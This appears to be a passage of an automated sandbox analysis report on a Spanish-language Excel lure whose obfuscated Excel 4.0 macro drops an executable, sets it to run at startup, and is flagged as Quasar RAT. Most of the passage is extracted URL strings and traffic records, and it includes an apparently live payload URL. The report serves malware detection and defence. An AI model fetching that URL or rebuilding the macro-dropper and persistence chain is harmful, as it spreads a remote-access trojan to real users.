                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.office.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.onedrive.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://apis.live.net/v5.0/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://augloop.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://augloop.office.com/v2
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cdn.entity.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://config.edge.skype.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cortana.ai
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cortana.ai/api
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://cr.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.o365filtering.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dev.cortana.ai
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://devnull.onenote.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://directory.services.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                  Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/PesterP
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                  Source: powershell.exe, 0000000A.00000003.789977084.0000000005699000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://graph.ppe.windows.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://graph.ppe.windows.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://graph.windows.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://graph.windows.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://lifecycle.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.microsoftonline.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.windows.local
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://management.azure.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://management.azure.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://messaging.office.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ncus-000.contentsync.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://officeapps.live.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://onedrive.live.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://onedrive.live.com/embed?
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office365.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://powerlift.acompli.net
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                  Source: a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
                  Source: a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com4
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                  Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://settings.outlook.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://shell.suite.office.com:1443
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://staging.cortana.ai
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://store.office.com/addinstemplate
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://store.office.de/addinstemplate
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://tasks.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://webshell.suite.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://wus2-000.contentsync.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                  Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/
                  Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://www.odwebp.svc.ms
                  Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/watch?v=Qxk6cu21JSg
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownHTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: a.exe, 00000001.00000002.708928788.0000000000AFB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                  Found Excel 4.0 Macro with suspicious formulasShow sources
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsInitial sample: EXEC
                  Found obfuscated Excel 4.0 MacroShow sources
                  Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsInitial sample: High usage of CHAR() function: 23
                  Office process drops PE fileShow sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\a.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exeJump to dropped file
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E6C154
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E6E597
                  Source: C:\ProgramData\a.exeCode function: 1_2_00E6E598
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 11_2_00FAC154
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 11_2_00FAE598
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 11_2_00FAE589
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD579D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD0740
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD16A8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD16FC
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD16E7
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD17B2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD178B
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD0730
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD172C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD170F
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD1773
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD175A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD1741
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD04D8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD04C9
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeCode function: 13_2_02BD3F7D
